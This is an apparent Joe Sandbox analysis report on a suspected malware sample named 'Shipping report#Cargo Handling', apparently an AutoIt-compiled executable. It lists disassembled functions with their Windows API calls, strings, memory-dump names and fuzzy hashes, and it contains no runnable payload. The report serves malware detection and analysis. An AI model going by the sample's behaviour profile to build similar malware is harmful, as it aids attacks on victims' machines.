DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00161990,00C678C0), ref: 000FC395

Strings

0, xrefs: 000FC2DF

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: f3ba62c2a076c8d6d6e400d56eb9633117d9e6cc388322bfd3bb2fdbab8443e6
Instruction ID: e3e594957e45a6cc9328be00b59162977098bdc5c63bebae6f3a4b9452f7e758
Opcode Fuzzy Hash: f3ba62c2a076c8d6d6e400d56eb9633117d9e6cc388322bfd3bb2fdbab8443e6
Instruction Fuzzy Hash: 1941D2712043099FE720DF25D946F7ABBE4AF85350F00861DFAA5976D2D730EA04DB52

Function 00124416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0012CC08,00000000,?,?,?,?), ref: 001244AA
GetWindowLongW.USER32 ref: 001244C7
SetWindowLongW.USER32(?,000000F0,00000000), ref: 001244D7

Strings

SysTreeView32, xrefs: 0012447C

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 3fa4d08f87d4f22c1b1ea31cf0b3f41d2baa90d65fb0291fa23eb324e4478b8b
Instruction ID: e75181627a0aeec6c11d4239901f0ed4049a6076e0a7e8b0d700d51ff06d1f44
Opcode Fuzzy Hash: 3fa4d08f87d4f22c1b1ea31cf0b3f41d2baa90d65fb0291fa23eb324e4478b8b
Instruction Fuzzy Hash: 90319A31200265AFDB209F78EC45BEA7BA9EB09324F204315F975A21E1D770ECA19B90

Function 0011304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0011335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00113077,?,?), ref: 00113378

inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0011307A
_wcslen.LIBCMT ref: 0011309B
htons.WSOCK32(00000000,?,?,00000000), ref: 00113106

Strings

255.255.255.255, xrefs: 00113095, 0011309A

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: ByteCharMultiWide_wcslenhtonsinet_addr
String ID: 255.255.255.255
API String ID: 946324512-2422070025
Opcode ID: 6a5878cbe408bdb1b476f5c1c6ea35d68492208972db0e704c8db36f3817f3ac
Instruction ID: 450d4f66c9673e1a7d1aa433ed15af421ed9cfc1c9da3df3526daaefa5c245dc
Opcode Fuzzy Hash: 6a5878cbe408bdb1b476f5c1c6ea35d68492208972db0e704c8db36f3817f3ac
Instruction Fuzzy Hash: AB310735200201DFCB28CF28C485EEA77E0EF18314F2580A9E9258B396CB31EF81C760

Function 00124653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00124705
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00124713
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0012471A

Strings

msctls_updown32, xrefs: 00124684

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: de1b45dec5a11636833ab933b965c7cc459b0d1551ee8d3dced7dc5aa00341fd
Instruction ID: ce6cb25e896320b5274cf21927bd90758b09955ce126e1f1189c20cb4900e924
Opcode Fuzzy Hash: de1b45dec5a11636833ab933b965c7cc459b0d1551ee8d3dced7dc5aa00341fd
Instruction Fuzzy Hash: 1A213EB5600219AFDB11DF64ECC1DAB37ADEB5A398B040059FA149B391CB71EC61DA60

Function 000F95AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 000F961D

Strings

#OnAutoItStartRegister, xrefs: 000F95F3
#notrayicon, xrefs: 000F95B7
#requireadmin, xrefs: 000F95D9

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: _wcslen
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 176396367-2734436370
Opcode ID: c36ff6e173c6170f7de2dfd86dcd853da4d0580bcefed8896ce96194769d253b
Instruction ID: 9907c4985dea8696b70a6570bdfd58d244c6593e5fb0cb3459a2512876597a31
Opcode Fuzzy Hash: c36ff6e173c6170f7de2dfd86dcd853da4d0580bcefed8896ce96194769d253b
Instruction Fuzzy Hash: ED215B3210462966C731AB24DC02FFB73DC9F51700F14402AFB49D7442EBA1DD52E395

Function 001237B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00123840
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00123850
MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00123876

Strings

Listbox, xrefs: 0012380F

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: e31538b94ca29b075bf62fedd425749589dd9c26bef1b3e5be651587e55bfb70
Instruction ID: f34163707f76ecfa6954176875b003fa71ab9965a095ae7e1ed8f5de5863c3ba
Opcode Fuzzy Hash: e31538b94ca29b075bf62fedd425749589dd9c26bef1b3e5be651587e55bfb70
Instruction Fuzzy Hash: 54219F72610228BBEF218F54EC85FBB376EEF89750F118124FA149B190C775DC628BA0

Function 001049F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00104A08
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00104A5C
SetErrorMode.KERNEL32(00000000,?,?,0012CC08), ref: 00104AD0

Strings

%lu, xrefs: 00104A6F

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: 4f8b9647256eeb35d0d3ac6f15d65f742651f3dddbf77c1f6a42df59a3c88441
Instruction ID: 23d71cdac1b3df7067838a973b75038cc7ad2d4e152a890871f266a77d281e6a
Opcode Fuzzy Hash: 4f8b9647256eeb35d0d3ac6f15d65f742651f3dddbf77c1f6a42df59a3c88441
Instruction Fuzzy Hash: 91313075A00109EFDB10DF58C885EAE77F8EF05304F1480A9E909DB252DB71ED45CBA1

Function 001241EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0012424F
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00124264
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00124271

Strings

msctls_trackbar32, xrefs: 00124226

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: a9c2a84fa1cab67828e4b56c67d2d36aae8b52a65d3814fc4328437754323c97
Instruction ID: f14afbe25d95585a6fb5a83fd076376dbeb3e82f56c53e66789c3c0c894ccbe0
Opcode Fuzzy Hash: a9c2a84fa1cab67828e4b56c67d2d36aae8b52a65d3814fc4328437754323c97
Instruction Fuzzy Hash: 5B11E331240218BFEF205E29EC06FAB3BACEF95B54F010114FA55E6090D3B1D8619B20

Function 000F2F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00096B57: _wcslen.LIBCMT ref: 00096B6A

Part of subcall function 000F2DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 000F2DC5
Part of subcall function 000F2DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 000F2DD6
Part of subcall function 000F2DA7: GetCurrentThreadId.KERNEL32 ref: 000F2DDD
Part of subcall function 000F2DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 000F2DE4

GetFocus.USER32 ref: 000F2F78

Part of subcall function 000F2DEE: GetParent.USER32(00000000), ref: 000F2DF9

GetClassNameW.USER32(?,?,00000100), ref: 000F2FC3
EnumChildWindows.USER32(?,000F303B), ref: 000F2FEB

Strings

%s%d, xrefs: 000F2FFF

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: 348fa898b417d2effc1f734bd16dc69862bbd7e12626c96219954a4a579e566a
Instruction ID: ca55ce0b29ea09fac51debbb96e3eb2463bcf13de93e6f035790786eb7d452bc
Opcode Fuzzy Hash: 348fa898b417d2effc1f734bd16dc69862bbd7e12626c96219954a4a579e566a
Instruction Fuzzy Hash: E311AF71600209ABCF547F608C95EFE37AAAF84314F044075BA099B693EF71994AAB60

Function 00125882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 001258C1
SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 001258EE
DrawMenuBar.USER32(?), ref: 001258FD

Strings

0, xrefs: 0012588F

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: 0
API String ID: 3227129158-4108050209
Opcode ID: 4b1546ff98b4e472e673dae23c55cc528e5ba18bb92eb487b39c49568a24c85f
Instruction ID: f0a6b3ccf11eb566d4e7a8e6f970e444d34d0536502f1ce51f8f6dc873a29810
Opcode Fuzzy Hash: 4b1546ff98b4e472e673dae23c55cc528e5ba18bb92eb487b39c49568a24c85f
Instruction Fuzzy Hash: F0016D31600228EFDB219F51EC84BAEBBB5FF45364F108099E949D6151DB308AE5DF61

Function 000F007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c5662de671194bb698aee989b35d6ab3f9656c7d51ac96cf296963d15afd230
Instruction ID: f88c1021be53ba6f84d94439761e2601cf578528e181beaa605d04a80618e487
Opcode Fuzzy Hash: 9c5662de671194bb698aee989b35d6ab3f9656c7d51ac96cf296963d15afd230
Instruction Fuzzy Hash: 6DC13C75A0021AEFDB14CFA4C894ABEB7B9FF48704F108598E605EB652D731EE41DB90

Function 000C3E80 Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 000C3F0B
__alldvrm.LIBCMT ref: 000C410C
__alldvrm.LIBCMT ref: 000C412E

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
Instruction ID: b2a65c86d541d7b55751fec93b3f1e45cf058d7c340f44a1c1311abecfc137d4
Opcode Fuzzy Hash: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
Instruction Fuzzy Hash: B3A15871E103869FDB25CF18C8A1FEEBBE5FF65350F28456DE9859B282C6348982C750

Function 0011342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00113459
CoUninitialize.OLE32 ref: 00113463
VariantInit.OLEAUT32(?), ref: 0011346E
VariantClear.OLEAUT32(?), ref: 0011371B

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Variant$ClearInitInitializeUninitialize
String ID:
API String ID: 1998397398-0
Opcode ID: 840015bd72f8569afea8aeb5c8220b70b4b2b9304c93f9903cf6583c701d9640
Instruction ID: e49198945e8d6dadd2aec7642ccde3476550bdef24da562a6b8c1d0be0964d25
Opcode Fuzzy Hash: 840015bd72f8569afea8aeb5c8220b70b4b2b9304c93f9903cf6583c701d9640
Instruction Fuzzy Hash: 9EA17F756087009FCB04DF24C485AAAB7E5FF88710F05886DF99A9B362DB70EE41DB91

Function 000F0436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,0012FC08,?), ref: 000F05F0
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,0012FC08,?), ref: 000F0608
CLSIDFromProgID.OLE32(?,?,00000000,0012CC40,000000FF,?,00000000,00000800,00000000,?,0012FC08,?), ref: 000F062D
_memcmp.LIBVCRUNTIME ref: 000F064E

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 0ec985615c5bbb9bc9fa080d7968d2c4a1e0b2fd8eafe5a59f0cd9c51098fb85
Instruction ID: 7a1bea70c0aec4164e75ce4f9c83d94192bce4068e7913eddf788b65ab69490e
Opcode Fuzzy Hash: 0ec985615c5bbb9bc9fa080d7968d2c4a1e0b2fd8eafe5a59f0cd9c51098fb85
Instruction Fuzzy Hash: C2811971A00109EFCB04DF94C988EEEB7B9FF89315F204558E606EB251DB71AE06DB60

Function 000D1391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 000D14C0

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 294253337a75b19bc8dfc160b73fde5decaf2d2c5f5680929e2a677e415f4287
Instruction ID: 85fa3abdee4cb41201ec1ac6e849515d6bf9156fb9cd0cd88a4645d87c991ca2
Opcode Fuzzy Hash: 294253337a75b19bc8dfc160b73fde5decaf2d2c5f5680929e2a677e415f4287
Instruction Fuzzy Hash: 76411435A00701BBDB256BB99C46BFE3AE4EF41330F14022BF41897393EE74894196B2

Function 00126278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(00C70BD0,?), ref: 001262E2
ScreenToClient.USER32(?,?), ref: 00126315
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00126382

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 8861135840f28e4239dd98298522ae04167c6af6b1e49064806cfa4920297cc4
Instruction ID: ec4f4abc94f5dba5a3776f0608c90b955a6e2da2e82becd0cd7db7647c451cf9
Opcode Fuzzy Hash: 8861135840f28e4239dd98298522ae04167c6af6b1e49064806cfa4920297cc4
Instruction Fuzzy Hash: A7513A74A00219EFCF24DF68E880AAE7BB5FF55364F108159F9599B290D730EDA1CB90

Function 00111AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00111AFD
WSAGetLastError.WSOCK32 ref: 00111B0B
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00111B8A
WSAGetLastError.WSOCK32 ref: 00111B94

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: 5d2d556cc19ed0e1688285d44ec625ed99bd456662c81bd11d3d5897d3c96d41
Instruction ID: ebf9031e8e2136bc14247f9e501884e599cad6eb82fc7a3cbd27454e989d1bc3
Opcode Fuzzy Hash: 5d2d556cc19ed0e1688285d44ec625ed99bd456662c81bd11d3d5897d3c96d41
Instruction Fuzzy Hash: FC41D6756002006FEB24AF24C886FA977E5AB44718F54C458FA1A9F7D3D772ED81CB90

Function 000CB41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fab9eea8337e9f504232340ac61c0f9af7483f7ffd96904521124a142818b5d
Instruction ID: bc46c8bf6d4b8d8eeb0b0fa86c546c5161289a49cdbda61703d69d9b9d3e0970
Opcode Fuzzy Hash: 9fab9eea8337e9f504232340ac61c0f9af7483f7ffd96904521124a142818b5d
Instruction Fuzzy Hash: 6541B075A44704AFD7289F78CC42FAEBBE9EB88710F10462EF551DB682D77199018790

Function 001056D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00105783
GetLastError.KERNEL32(?,00000000), ref: 001057A9
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 001057CE
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 001057FA

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

